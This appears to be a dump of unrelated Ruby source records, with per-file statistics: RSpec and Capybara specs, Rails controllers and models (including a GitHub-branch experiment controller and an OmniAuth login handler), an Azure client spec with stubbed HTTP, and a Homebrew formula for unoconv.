describe "with :class and :extend" do
let (:yaml_album) { Module.new do
include Representable::YAML
collection :songs, :class => Song do
property :name
property :track
end
end }
let (:album) { Album.new([Song.new("Liar", 1), Song.new("What I Know", 2)]) }
describe "#to_yaml" do
it "renders collection of typed property" do
album.extend(yaml_album).to_yaml.must_equal "---
songs:
- name: Liar
track: 1
- name: What I Know
track: 2
"
end
end
describe "#from_yaml" do
it "parses collection of typed property" do
album.extend(yaml_album).from_yaml("---
songs:
- name: One Shot Deal
track: 4
- name: Three Way Dance
track: 5").must_equal Album.new([Song.new("One Shot Deal", 4), Song.new("Three Way Dance", 5)])
end
end
end
end
end | 22.666667 | 97 | 0.615741 |
1a5071aa5fbcda701f07688b9ffa54d78090eeec | 793 | describe UseCases::Administrator::FormatEmailDomainsList do
let(:result) { subject.execute(email_domains) }
context "with no email domains" do
let(:email_domains) { [] }
it "creates no whitelist" do
expect(result.read).to eq("--- []\n")
end
it "returns an IO object" do
expect(result).to be_an_instance_of(StringIO)
end
end
context "when one email domain is added" do
let(:email_domains) { ["gov.uk"] }
it "creates a whitelist with one entry" do
expect(result.read).to eq("---\n- gov.uk\n")
end
end
context "when two email domains are added" do
let(:email_domains) { ["gov.uk", "made.eu"] }
it "creates a whitelist with two entries" do
expect(result.read).to eq("---\n- gov.uk\n- made.eu\n")
end
end
end
| 24.78125 | 61 | 0.638083 |
ff887851ea8e4f8bfb37a508d94c3cc97026a7d4 | 273 | module ToSelect
module Array
def to_select(text_method = :name, options = {})
list = self.map { |x| [x.send(text_method), x.id] }
list.unshift [options[:default], nil] if options[:default]
list
end
end
end
Array.send :include, ToSelect::Array
| 24.818182 | 64 | 0.644689 |
08bbf265bb6b525ad0bd9b3bebde8711b70d153d | 94 | require 'rspec'
require 'webmock/rspec'
WebMock.disable_net_connect!(allow_localhost: false)
| 18.8 | 52 | 0.819149 |
ffc27d07d69fa4f1540499092761aaddfb441529 | 2,970 | require 'github_api'
require 'net/http'
class GgithubsController < ApplicationController
skip_before_action :verify_authenticity_token
def index
@upstream = Round.where(repo: 'DNN-train').where.not(rate: [888, 999]).order(id: :desc) || Round.none
if params[:select_repo] = 'true'
origin_downstreams = get_branches "twgo/DNN-test"
hidden_branches = Rails.configuration.my_hidden_branches
@downstreams = origin_downstreams.select{ |b| (hidden_branches.exclude? b[:down_name]) }
end
origin_code = get_dockerfile(params[:repo], params[:sha])
repo_ver = 'dnn-train:'
@github_code = params[:upstream].blank? ? origin_code : origin_code.split("\n")[0..-1].map{ |x|
if x.include?(repo_ver)
"FROM dockerhub.iis.sinica.edu.tw/#{repo_ver}#{params[:upstream].split('/')[-1]}"
else
x
end
}.join("\n")
if params[:downstream]
@round_in_history = Round.where(id: DownStream.where(branch: params[:downstream].split('oooo')[0]).pluck(:round_id)).order(id: :desc)
end
end
def update
Exp.create(
upstream: params[:github_code][:upstream],
upstream_info: params[:github_code][:upstream_info],
repo: params[:github_code][:repo],
branch: params[:github_code][:branch],
content: params[:github_code][:content],
sha: params[:github_code][:sha],
status: 'added'
)
redirect_to ggithubs_path(select_down: 'yes'), notice: "實驗已建立!"
end
def create_exp_on_github upstream_info, repo, branch, content, sha
temp_branch = "_#{branch}"
create_branch(repo, temp_branch, sha)
message = "EXP RUN: #{upstream_info}"
github_contents = Github::Client::Repos::Contents.new oauth_token: ENV['GITHUB_TOKEN']
file = github_contents.get 'twgo', repo, 'Dockerfile', ref: branch
github_contents.update('twgo', repo, 'Dockerfile',
path: 'Dockerfile',
branch: temp_branch,
message: message,
content: content,
sha: file.sha,
)
sleep 3
delete_branch(repo, temp_branch)
end
private
def get_dockerfile repo, sha
url = "https://raw.githubusercontent.com/twgo/#{repo}/#{sha}/Dockerfile"
Net::HTTP.get(URI.parse(URI.unescape(URI.encode(url)))).force_encoding("UTF-8")
end
def get_branches org_repo
github_client = Octokit::Client.new(login: ENV['GITHUB_ID'] , password: ENV['GITHUB_SECRET'], per_page: 200)
github_client.branches(org_repo).map{ |x| {
down_name: x[:name],
down_sha: x[:commit][:sha],
}}
end
def create_branch repo, temp_branch, sha
github_client = Octokit::Client.new(login: ENV['GITHUB_ID'] , password: ENV['GITHUB_SECRET'])
github_client.create_ref "twgo/#{repo}", "heads/#{temp_branch}", sha
end
def delete_branch repo, temp_branch
github_client = Octokit::Client.new(login: ENV['GITHUB_ID'] , password: ENV['GITHUB_SECRET'])
github_client.delete_ref "twgo/#{repo}", "heads/#{temp_branch}"
end
end
| 33.370787 | 139 | 0.673401 |
1abd9ccc4f0db5e8e1e297dfc2fd98fdb544a3e2 | 9,749 | # frozen_string_literal: true
require 'spec_helper'
require 'webmock/rspec'
WebMock.disable_net_connect!(allow_localhost: true)
describe Bosh::AzureCloud::AzureClient do
let(:logger) { Bosh::Clouds::Config.logger }
let(:azure_client) do
Bosh::AzureCloud::AzureClient.new(
mock_azure_config,
logger
)
end
let(:subscription_id) { mock_azure_config.subscription_id }
let(:tenant_id) { mock_azure_config.tenant_id }
let(:token_api_version) { AZURE_API_VERSION }
let(:token_uri) { "https://login.microsoftonline.com/#{tenant_id}/oauth2/token?api-version=#{token_api_version}" }
let(:valid_access_token) { 'valid-access-token' }
let(:expires_on) { (Time.new + 1800).to_i.to_s }
let(:storage_api_version) { AZURE_RESOURCE_PROVIDER_STORAGE }
let(:storage_account_name) { 'fake-storage-account-name' }
let(:location) { 'fake-location' }
let(:sku) { 'Standard_LRS' }
let(:kind) { 'StorageV2' }
let(:tags) { { 'foo' => 'bar' } }
let(:request_id) { 'fake-request-id' }
let(:operation_status_link) { "https://management.azure.com/subscriptions/#{subscription_id}/operations/#{request_id}" }
describe '#create_storage_account' do
let(:storage_account_uri) { "https://management.azure.com/subscriptions/#{subscription_id}/resourceGroups/#{MOCK_RESOURCE_GROUP_NAME}/providers/Microsoft.Storage/storageAccounts/#{storage_account_name}?api-version=#{storage_api_version}" }
let(:request_body) do
{
location: location,
sku: {
name: sku
},
kind: kind,
tags: tags
}
end
context 'when the response status code is 200' do
it 'should create the storage account without errors' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, storage_account_uri).with(body: request_body).to_return(
status: 200,
body: '',
headers: {}
)
expect(
azure_client.create_storage_account(storage_account_name, location, sku, kind, tags)
).to be(true)
end
end
context 'when the response status code is neither 200 nor 202' do
it 'should raise an error' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, storage_account_uri).with(body: request_body).to_return(
status: 404,
body: '',
headers: {}
)
expect do
azure_client.create_storage_account(storage_account_name, location, sku, kind, tags)
end.to raise_error(/create_storage_account - Cannot create the storage account '#{storage_account_name}'. http code: 404/)
end
end
context 'when the response status code is 202' do
let(:default_retry_after) { 10 }
context 'when the status code of the response to the asynchronous operation is 200' do
context 'when the provisioning state is Succeeded' do
it 'should create the storage account without errors' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, storage_account_uri).with(body: request_body).to_return(
status: 202,
body: '',
headers: {
'Location' => operation_status_link
}
)
stub_request(:get, operation_status_link).to_return(
status: 200,
body: '{"status":"Succeeded"}',
headers: {}
)
expect(azure_client).to receive(:sleep).with(default_retry_after)
expect(
azure_client.create_storage_account(storage_account_name, location, sku, kind, tags)
).to be(true)
end
end
context 'when the provisioning state is Failed' do
context 'when there is no Retry-After in the response header' do
it 'should raise an error' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, storage_account_uri).with(body: request_body).to_return(
status: 202,
body: '',
headers: {
'Location' => operation_status_link
}
)
stub_request(:get, operation_status_link).to_return(
status: 200,
body: '{"status":"Failed"}',
headers: {}
)
expect(azure_client).to receive(:sleep).with(default_retry_after)
expect do
azure_client.create_storage_account(storage_account_name, location, sku, kind, tags)
end.to raise_error(/Error message: {"status":"Failed"}/)
end
end
context 'when there is Retry-After in the response header' do
context 'retry succeed' do
it 'should create the storage account after retry' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, storage_account_uri).with(body: request_body).to_return(
status: 202,
body: '',
headers: {
'Location' => operation_status_link
}
)
stub_request(:get, operation_status_link).to_return(
{
status: 200,
body: '{"status":"Failed"}',
headers: {
'Retry-After' => '1'
}
},
status: 200,
body: '{"status":"Succeeded"}',
headers: {}
)
expect(azure_client).to receive(:sleep).with(default_retry_after).exactly(2).times
expect(azure_client).to receive(:sleep).with(1).exactly(1).times
expect(
azure_client.create_storage_account(storage_account_name, location, sku, kind, tags)
).to be(true)
end
end
context 'retry failed' do
it 'should get one exception' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, storage_account_uri).with(body: request_body).to_return(
status: 202,
body: '',
headers: {
'Location' => operation_status_link
}
)
eleven_failed = []
11.times do
eleven_failed.push(
status: 200,
body: '{"status":"Failed"}',
headers: {
'Retry-After' => '1'
}
)
end
stub_request(:get, operation_status_link).to_return(
eleven_failed
)
expect(azure_client).to receive(:sleep).with(default_retry_after).exactly(11).times
expect(azure_client).to receive(:sleep).with(1).exactly(11).times
expect do
azure_client.create_storage_account(storage_account_name, location, sku, kind, tags)
end.to raise_error(Bosh::AzureCloud::AzureAsynInternalError, /create_storage_account - http code: 200/)
end
end
end
end
end
context 'when the status code of the response to the asynchronous operation is not one of 200 and 202' do
it 'should raise an error' do
stub_request(:post, token_uri).to_return(
status: 200,
body: {
'access_token' => valid_access_token,
'expires_on' => expires_on
}.to_json,
headers: {}
)
stub_request(:put, storage_account_uri).with(body: request_body).to_return(
status: 202,
body: '',
headers: {
'Location' => operation_status_link
}
)
stub_request(:get, operation_status_link).to_return(
status: 404,
body: 'fake-response-body',
headers: {}
)
expect(azure_client).to receive(:sleep).with(default_retry_after)
expect do
azure_client.create_storage_account(storage_account_name, location, sku, kind, tags)
end.to raise_error(/create_storage_account - http code: 404. Error message: fake-response-body/)
end
end
end
end
end
| 36.376866 | 243 | 0.535747 |
1ab96c63f068c37d23a6c2701e35e275b49e1719 | 7,295 | require File.expand_path('../../../../../helper', __FILE__)
describe 'Sections::Controller::Revisions' do
behaves_like :capybara
textbox_id = CustomFields::Model::CustomFieldType[:name => 'textbox'].id
checkbox_id = CustomFields::Model::CustomFieldType[:name => 'checkbox'].id
section = Sections::Model::Section.create(
:name => 'Spec section',
:comment_allow => true,
:comment_require_account => true,
:comment_moderate => true,
:comment_format => 'plain'
)
group = CustomFields::Model::CustomFieldGroup.create(:name => 'Spec fields')
field = CustomFields::Model::CustomField.create(
:name => 'Spec field',
:sort_order => 0,
:format => 'markdown',
:required => true,
:text_editor => false,
:custom_field_group_id => group.id,
:custom_field_type_id => textbox_id
)
field_1 = CustomFields::Model::CustomField.create(
:name => 'Spec checkbox',
:sort_order => 1,
:format => 'plain',
:required => true,
:text_editor => false,
:custom_field_group_id => group.id,
:custom_field_type_id => checkbox_id,
:possible_values => "Yorick Peterse|yorick\nChuck Norris|chuck"
)
section.custom_field_group_pks = [group.id]
entries_url = Sections::Controller::SectionEntries.r(:index, section.id).to_s
edit_url = Sections::Controller::SectionEntries.r(:edit, section.id).to_s
revisions_url = lang('revisions.titles.index')
restore_url = lang('revisions.labels.restore')
new_button = lang('section_entries.buttons.new')
save_button = lang('section_entries.buttons.save')
compare_button = lang('revisions.buttons.compare')
title_field = lang('section_entries.labels.title')
it 'Create a new revision each time a section entry is saved' do
visit(entries_url)
click_on(new_button)
within '#section_entry_form' do
fill_in(title_field, :with => 'Entry with revisions')
fill_in(field.name, :with => 'Original value')
check("form_custom_field_value_#{field_1.id}_0")
click_on(save_button)
end
current_path.should =~ /#{edit_url}\/[0-9]+/
page.has_selector?('.message.error').should == false
9.times do |number|
within '#section_entry_form' do
fill_in(field.name, :with => "Modified #{number}")
click_on(save_button)
end
end
page.find_field(field.name).value.should == 'Modified 8'
Sections::Model::SectionEntry[:title => 'Entry with revisions'] \
.revisions.length.should == 10
end
it 'Compare two different revisions' do
entry = Sections::Model::SectionEntry[:title => 'Entry with revisions']
url = Sections::Controller::Revisions \
.r(:index, entry.section_id, entry.id) \
.to_s
revisions = Sections::Model::Revision.filter(:section_entry_id => entry.id) \
.order(:id.asc) \
.all
visit(entries_url)
click_on(revisions_url)
page.current_path.should == url
page.all('table tbody tr').count.should == 10
choose("old_revision_id_#{revisions[0].id}")
choose("new_revision_id_#{revisions[1].id}")
click_on(compare_button)
page.has_selector?('.diff').should == true
page.has_selector?('.diff .ins').should == true
page.has_selector?('.diff .del').should == true
page.has_selector?('.diff .line_number').should == true
page.has_content?('Original value').should == true
page.has_content?('Modified 0').should == true
page.find('.diff .del').text.strip.should == '-Original value'
page.find('.diff .ins').text.strip.should == '+Modified 0'
choose("old_revision_id_#{revisions[1].id}")
choose("new_revision_id_#{revisions[2].id}")
click_on(compare_button)
page.find('.diff .del').text.strip.should == '-Modified 0'
page.find('.diff .ins').text.strip.should == '+Modified 1'
end
it 'Compare the same two revisions' do
entry = Sections::Model::SectionEntry[:title => 'Entry with revisions']
url = Sections::Controller::Revisions \
.r(:index, entry.section_id, entry.id) \
.to_s
revisions = Sections::Model::Revision.filter(:section_entry_id => entry.id) \
.order(:id.asc) \
.all
visit(entries_url)
click_on(revisions_url)
page.current_path.should == url
page.all('table tbody tr').count.should == 10
choose("old_revision_id_#{revisions[0].id}")
choose("new_revision_id_#{revisions[0].id}")
click_on(compare_button)
page.has_selector?('.diff').should == false
page.has_content?(lang('revisions.messages.no_differences')).should == true
end
it 'The oldest revision should be removed if the limit is exceeded' do
entry = Sections::Model::SectionEntry[:title => 'Entry with revisions']
oldest = entry.revisions[-1].id
visit(entries_url)
click_on('Entry with revisions')
5.times do |number|
within '#section_entry_form' do
fill_in(field.name, :with => "Overwritten #{number}")
click_on(save_button)
end
end
revisions = Sections::Model::Revision.filter(:section_entry_id => entry.id) \
.order(:id.asc) \
.all
revisions.length.should == 10
revisions[0].id.should > oldest
end
it 'Gracefully handle non numeric revision IDs' do
visit(entries_url)
visit(Sections::Controller::Revisions.r(:restore, 'a').to_s)
page.current_path.should == entries_url
page.has_selector?('.message.error').should == true
end
it 'Restore a revision and delete newer revisions' do
visit(entries_url)
click_on(revisions_url)
within 'table tbody tr:last-child' do
click_on(restore_url)
end
page.has_selector?('.message.success').should == true
page.all('table tbody tr').count.should == 1
Sections::Model::SectionEntry[:title => 'Entry with revisions'] \
.revisions \
.length \
.should == 1
visit(entries_url)
click_on('Entry with revisions')
page.find_field(field.name).value.should == 'Modified 4'
end
it 'Compare array based values of two revisions' do
visit(entries_url)
click_on('Entry with revisions')
within '#section_entry_form' do
check("form_custom_field_value_#{field_1.id}_1")
click_on(save_button)
end
page.has_selector?('.message.error').should == false
visit(entries_url)
click_on(revisions_url)
entry = Sections::Model::SectionEntry[:title => 'Entry with revisions']
revisions = Sections::Model::Revision.filter(:section_entry_id => entry.id) \
.order(:id.asc) \
.all
choose("old_revision_id_#{revisions[-1].id}")
choose("new_revision_id_#{revisions[-2].id}")
click_on(compare_button)
page.has_selector?('.diff .ins').should == false
page.has_selector?('.diff .del').should == true
page.has_content?('yorick').should == true
page.has_content?('chuck').should == true
end
field.destroy
field_1.destroy
group.destroy
section.destroy
end
| 30.911017 | 82 | 0.635504 |
ac867b4c4c65257d37cbf467ab806f57ae0049e0 | 396 | class AddInstitutionsAndEvents < ActiveRecord::Migration[6.0]
def up
create_table(:institutions) do |t|
t.string :name
t.timestamps
end
create_table(:events) do |t|
t.string :name
t.string :type
t.datetime :date
t.belongs_to :institution
t.timestamps
end
end
def down
drop_table :institutions
drop_table :events
end
end
| 18 | 61 | 0.643939 |
1c25a1b909e86ba3f9c913d60f71c4ae176afe61 | 588 | class OmniauthController < ApplicationController
def google_oauth2
@user = User.create_from_provider_data(request.env['omniauth.auth'])
if @user.persisted?
sign_in_and_redirect @user
else
flash[:error] = 'There was a problem signing you in through Google. Please register or try again later.'
redirect_to new_user_registration_url
end
end
def failure
flash[:error] = "There was a problem signing you in. Please register or try signing in later."
redirect_to new_user_registration_url
end
end
| 32.666667 | 116 | 0.685374 |
87962392fc3fb5b7a3dba8005f40313cd3af8c4e | 549 | # Adds a very long max-age response header when the requested url
# looks like it includes a cache busting timestamp. Cache busting
# URLs look like this:
# http://HOST/PATH?DIGITS
#
# DIGITS is typically the number of seconds since some epoch but
# this can theoretically be any set of digits. Example:
# http://example.com/css/foo.css?7894387283
#
on :fetch do
next if response.freshness_information?
if request.url =~ /\?\d+$/
trace 'adding huge max-age to response for cache busting URL'
response.ttl = 100000000000000
end
end
| 32.294118 | 65 | 0.737705 |
03eccb74a6f240c9ae622ef7a3986408148e6de4 | 228 | class User < ActiveRecord::Base
has_secure_password
has_many :tweets
def slug
username.gsub(" ", "-")
end
def self.find_by_slug(slug)
unslug = slug.gsub("-", " ")
self.find_by(username: unslug)
end
end
| 16.285714 | 34 | 0.649123 |
08fea6c0f08a3451e6bbf83c0f0e2c22987a1ac4 | 1,321 | class Unoconv < Formula
desc "Convert between any document format supported by OpenOffice"
homepage "http://dag.wiee.rs/home-made/unoconv/"
url "http://dag.wieers.com/home-made/unoconv/unoconv-0.7.tar.gz"
sha256 "56abbec55632b19dcaff7d506ad6e2fd86f53afff412e622cc1e162afb1263fa"
head "https://github.com/dagwieers/unoconv.git"
bottle do
cellar :any_skip_relocation
sha256 "cead2876612e72e232f8abdb037329dc5f2f98b3665f723ff556369a6e3888c1" => :high_sierra
sha256 "67de3e479604cf777e763c116a47793fda5791feaa322af1f2226dc7f0491ddf" => :sierra
sha256 "432c15c1bab856edb94784c5849a120f6397d0198ec7e3acedff679f65f6841c" => :el_capitan
sha256 "82e4120b114a941e5a099ca5ca3df12270f66795d8292a95d4164bcd3199edac" => :yosemite
sha256 "db9fc7afd8681160e90f2e3de016e92bffe9d4d541cd70b50abe85b3c987f7d1" => :mavericks
sha256 "a3894454d5da2486c89ae3b3745051144a6cedabb2777dfaac2f83230ece9e6d" => :x86_64_linux # glibc 2.19
sha256 "ae47973f02b31408afac680814bfb26002714faded753a9c753c3ab28977572b" => :mountain_lion
end
depends_on :python if MacOS.version <= :snow_leopard
def install
system "make", "install", "prefix=#{prefix}"
end
def caveats; <<~EOS
In order to use unoconv, a copy of LibreOffice between versions 3.6.0.1 - 4.3.x must be installed.
EOS
end
end
| 44.033333 | 107 | 0.794095 |
1cd743aca9f7819c9e76a42d0ca3b19d645ffd60 | 177 | require 'test/unit'
class TypoTextfilterTextileAndMarkdownTest < Test::Unit::TestCase
# Replace this with your real tests.
def test_this_plugin
flunk
end
end
| 19.666667 | 66 | 0.734463 |
62714b3d5fbe8ec67d6b6d690da4348ac1d7bb9f | 10,852 | # frozen_string_literal: true
require 'rails_helper'
require_relative '../fabricators/reaction_fabricator.rb'
require_relative '../fabricators/reaction_user_fabricator.rb'
describe DiscourseReactions::ReactionNotification do
before do
SiteSetting.discourse_reactions_enabled = true
PostActionNotifier.enable
end
fab!(:post_1) { Fabricate(:post) }
fab!(:thumbsup) { Fabricate(:reaction, post: post_1, reaction_value: 'thumbsup') }
fab!(:user_1) { Fabricate(:user) }
fab!(:user_2) { Fabricate(:user) }
fab!(:user_3) { Fabricate(:user) }
fab!(:reaction_user1) { Fabricate(:reaction_user, reaction: thumbsup, user: user_1) }
fab!(:like_reaction) { Fabricate(:reaction, post: post_1, reaction_value: 'heart') }
it 'does not create notification when user is muted' do
MutedUser.create!(user_id: post_1.user.id, muted_user_id: user_1.id)
expect { described_class.new(thumbsup, user_1).create }.to change { Notification.count }.by(0)
end
it 'does not create notification when topic is muted' do
TopicUser.create!(
topic: post_1.topic,
user: post_1.user,
notification_level: TopicUser.notification_levels[:muted]
)
MutedUser.create!(user_id: post_1.user.id, muted_user_id: user_1.id)
described_class.new(thumbsup, user_1).create
expect { described_class.new(thumbsup, user_1).create }.to change { Notification.count }.by(0)
end
it 'does not create notification when notification setting is never' do
post_1.user.user_option.update!(
like_notification_frequency:
UserOption.like_notification_frequency_type[:never]
)
MutedUser.create!(user_id: post_1.user.id, muted_user_id: user_1.id)
expect { described_class.new(thumbsup, user_1).create }.to change { Notification.count }.by(0)
end
it 'correctly creates notification when notification setting is first time and daily' do
post_1.user.user_option.update!(
like_notification_frequency:
UserOption.like_notification_frequency_type[:first_time_and_daily]
)
expect { described_class.new(thumbsup, user_1).create }.to change { Notification.count }.by(1)
expect(Notification.last.user_id).to eq(post_1.user.id)
expect(Notification.last.notification_type).to eq(Notification.types[:reaction])
expect(JSON.parse(Notification.last.data)['original_username']).to eq(user_1.username)
user_2 = Fabricate(:user)
Fabricate(:reaction_user, reaction: thumbsup, user: user_2)
expect { described_class.new(thumbsup, user_2).create }.to change { Notification.count }.by(0)
freeze_time(Time.zone.now + 1.day)
cry = Fabricate(:reaction, post: post_1, reaction_value: 'cry')
Fabricate(:reaction_user, reaction: cry, user: user_2)
expect { described_class.new(cry, user_2).create }.to change { Notification.count }.by(1)
end
it 'deletes notification when all reactions are removed' do
expect { described_class.new(thumbsup, user_1).create }.to change { Notification.count }.by(1)
cry = Fabricate(:reaction, post: post_1, reaction_value: 'cry')
Fabricate(:reaction_user, reaction: cry, user: user_1)
expect { described_class.new(cry, user_1).create }.to change { Notification.count }.by(0)
user_2 = Fabricate(:user)
Fabricate(:reaction_user, reaction: cry, user: user_2)
expect { described_class.new(cry, user_1).create }.to change { Notification.count }.by(0)
expect(JSON.parse(Notification.last.data)['display_username']).to eq(user_1.username)
DiscourseReactions::ReactionUser.find_by(reaction: cry, user: user_1).destroy
DiscourseReactions::ReactionUser.find_by(reaction: thumbsup, user: user_1).destroy
expect do
described_class.new(cry, user_1).delete
described_class.new(thumbsup, user_1).delete
end.to change { Notification.count }.by(0)
expect(JSON.parse(Notification.last.data)['display_username']).to eq(user_2.username)
expect(Notification.last.notification_type).to eq(Notification.types[:reaction])
DiscourseReactions::ReactionUser.find_by(reaction: cry, user: user_2).destroy
expect { described_class.new(cry, user_2).delete }.to change { Notification.count }.by(-1)
end
it 'adds the heart icon when the remaining notification is a like' do
Fabricate(:reaction_user, reaction: like_reaction, user: user_2)
described_class.new(like_reaction, user_2).create
DiscourseReactions::ReactionUser.find_by(reaction: thumbsup, user: user_1).destroy!
described_class.new(thumbsup, user_1).delete
remaining_notification = Notification.where(notification_type: Notification.types[:reaction]).last
expect(remaining_notification.data_hash[:reaction_icon]).to eq(like_reaction.reaction_value)
end
it "doesn't add the heart icon when not all remaining notifications are likes" do
Fabricate(:reaction_user, reaction: like_reaction, user: user_2)
described_class.new(like_reaction, user_2).create
cry = Fabricate(:reaction, post: post_1, reaction_value: 'cry')
Fabricate(:reaction_user, reaction: cry, user: user_3)
described_class.new(cry, user_3).create
DiscourseReactions::ReactionUser.find_by(reaction: thumbsup, user: user_1).destroy!
described_class.new(thumbsup, user_1).delete
remaining_notification = Notification.where(notification_type: Notification.types[:reaction]).last
expect(remaining_notification.data_hash[:reaction_icon]).to be_nil
end
describe 'consolidating reaction notifications' do
fab!(:post_2) { Fabricate(:post, user: post_1.user) }
let!(:cry_p1) { Fabricate(:reaction, post: post_1, reaction_value: 'cry') }
let!(:cry_p2) { Fabricate(:reaction, post: post_2, reaction_value: 'cry') }
describe 'multiple reactions from the same user' do
before do
SiteSetting.notification_consolidation_threshold = 1
end
it 'consolidates notifications from the same user' do
described_class.new(cry_p1, user_2).create
described_class.new(cry_p2, user_2).create
expect(Notification.where(notification_type: Notification.types[:reaction], user: post_1.user).count).to eq(1)
consolidated_notification = Notification.where(notification_type: Notification.types[:reaction]).last
expect(consolidated_notification.data_hash[:consolidated]).to eq(true)
expect(consolidated_notification.data_hash[:username]).to eq(user_2.username)
end
it "doesn't update a consolidated notification when a different user reacts to a post" do
described_class.new(cry_p1, user_2).create
described_class.new(cry_p2, user_2).create
described_class.new(cry_p2, user_3).create
expect(Notification.where(notification_type: Notification.types[:reaction], user: post_1.user).count).to eq(2)
consolidated_notification = Notification.where(notification_type: Notification.types[:reaction]).last
expect(consolidated_notification.data_hash[:consolidated]).to be_nil
expect(consolidated_notification.data_hash[:display_username]).to eq(user_3.username)
end
it 'keeps the reaction icon when consolidating multiple likes from the same user' do
like_reaction_p2 = Fabricate(:reaction, post: post_2, reaction_value: 'heart')
described_class.new(like_reaction, user_2).create
described_class.new(like_reaction_p2, user_2).create
consolidated_notification = Notification.where(notification_type: Notification.types[:reaction]).last
expect(consolidated_notification.data_hash[:consolidated]).to eq(true)
expect(consolidated_notification.data_hash[:reaction_icon]).to eq(like_reaction.reaction_value)
end
it "doesn't add the reaction icon when consolidating a non-like and a like notification" do
described_class.new(cry_p2, user_2).create
described_class.new(like_reaction, user_2).create
consolidated_notification = Notification.where(notification_type: Notification.types[:reaction]).last
expect(consolidated_notification.data_hash[:reaction_icon]).to be_nil
end
it 'removes the reaction icon when updating a like consolidated notification with a different reactions' do
like_reaction_p2 = Fabricate(:reaction, post: post_2, reaction_value: 'heart')
post_3 = Fabricate(:post, user: post_1.user)
cry_p3 = Fabricate(:reaction, post: post_3, reaction_value: 'cry')
described_class.new(like_reaction, user_2).create
described_class.new(like_reaction_p2, user_2).create
described_class.new(cry_p3, user_2).create
consolidated_notification = Notification.where(notification_type: Notification.types[:reaction]).last
expect(consolidated_notification.data_hash[:reaction_icon]).to be_nil
end
end
describe 'multiple users reacting to the same post' do
before do
post_1.user.user_option.update!(
like_notification_frequency:
UserOption.like_notification_frequency_type[:always]
)
end
it 'keeps one notification pointing to the two last users that reacted to a post' do
described_class.new(cry_p1, user_2).create
described_class.new(thumbsup, user_3).create
expect(Notification.where(notification_type: Notification.types[:reaction], user: post_1.user).count).to eq(1)
consolidated_notification = Notification.where(notification_type: Notification.types[:reaction]).last
expect(consolidated_notification.data_hash[:username2]).to eq(user_2.username)
expect(consolidated_notification.data_hash[:display_username]).to eq(user_3.username)
end
it 'creates a new notification if the last one was created more than one day ago' do
first_notification = described_class.new(cry_p1, user_2).create
first_notification.update!(created_at: 2.days.ago)
described_class.new(thumbsup, user_3).create
expect(Notification.where(notification_type: Notification.types[:reaction], user: post_1.user).count).to eq(2)
end
it 'keeps the icon of the last notification' do
described_class.new(thumbsup, user_3).create
described_class.new(like_reaction, user_2).create
consolidated_notification = Notification.where(notification_type: Notification.types[:reaction]).last
expect(consolidated_notification.data_hash[:reaction_icon]).to eq(like_reaction.reaction_value)
end
end
end
describe 'stores the icon in the notification payload' do
it 'stores the heart icon for like reactions' do
described_class.new(like_reaction, user_2).create
notification = Notification.where(user: post_1.user, notification_type: Notification.types[:reaction]).last
expect(notification.data_hash[:reaction_icon]).to eq(like_reaction.reaction_value)
end
end
end
| 45.405858 | 118 | 0.740048 |
798edc0e8423bd11a40db6dff961af1a0c2f0870 | 1,730 | require 'rails_helper'
RSpec.describe Api::V0::NewsletterSubscriptionsController, :type => :controller do
describe "POST create" do
before(:each) do
stub_request(:post, "https://us8.api.mailchimp.com/2.0/lists/subscribe.json").
to_return(:status => 200, :body => "", :headers => {})
end
context "with correct parameters" do
let(:newsletter_subscription_attributes) { attributes_for(:newsletter_subscription) }
it "renders 201" do
post 'create', newsletter_subscription: {email: newsletter_subscription_attributes[:email], active: newsletter_subscription_attributes[:active]}, format: :json
expect(response.status).to eq(201)
end
it "creates new subscription" do
newsletter_subscription_count = NewsletterSubscription.count
post 'create', newsletter_subscription: {email: newsletter_subscription_attributes[:email], active: newsletter_subscription_attributes[:active]}, format: :json
expect(NewsletterSubscription.count).to be(newsletter_subscription_count + 1)
end
it "renders newsletter subscription" do
post 'create', newsletter_subscription: {email: newsletter_subscription_attributes[:email], active: newsletter_subscription_attributes[:active]}, format: :json
expect(JSON.parse(response.body)).to eq("newsletter_subscription"=>{"email"=>newsletter_subscription_attributes[:email], "active"=>true})
end
end
context "with incorrect parameters" do
it "renders 400" do
post 'create', newsletter_subscription: {not_email_param: "[email protected]", not_active_param: true}, :format => :json
expect(response.status).to eq(400)
end
end
end
end
| 41.190476 | 167 | 0.717341 |
91f4840f84fd321007d9a7e61190795628a7f20e | 233 | class C80AlbumGalleryAddPreviewToProps < ActiveRecord::Migration
def change
add_column :c80_album_gallery_props, :thumb_preview_width, :integer
add_column :c80_album_gallery_props, :thumb_preview_height, :integer
end
end
| 33.285714 | 72 | 0.824034 |
abb69fd20ca58582eab23ba9120930399a958468 | 652 | module Gemfury
module Const
class << self
def host
'www.gemfury.com'
#'localhost:3000'
end
def welcome
"Welcome to Gemfury!\nPlease complete the following information"
end
def email_error
"Invalid email address. Please try again."
end
def email_regex
return @email_regex if @email_regex
email_name_regex = '[A-Z0-9_\.%\+\-\']+'
domain_head_regex = '(?:[A-Z0-9\-]+\.)+'
domain_tld_regex = '(?:[A-Z]{2,4}|museum|travel)'
@email_regex = /^#{email_name_regex}@#{domain_head_regex}#{domain_tld_regex}$/i
end
end
end
end
| 24.148148 | 87 | 0.578221 |
330aa04310290b475986083fb907b28da7f058b5 | 3,112 | # frozen_string_literal: true
require "rspec"
require "rspec/expectations"
require "capybara"
require "capybara/rspec" # Required here instead of in rspec_spec to avoid RSpec deprecation warning
require "capybara/spec/test_app"
require "nokogiri"
# Alias be_truthy/be_falsey if not already defined to be able to use in RSpec 2 and 3
unless RSpec::Matchers.method_defined?(:be_truthy)
RSpec::Matchers.module_eval do
alias be_truthy be_true
alias be_falsey be_false
alias be_falsy be_false
end
end
module Capybara
module SpecHelper
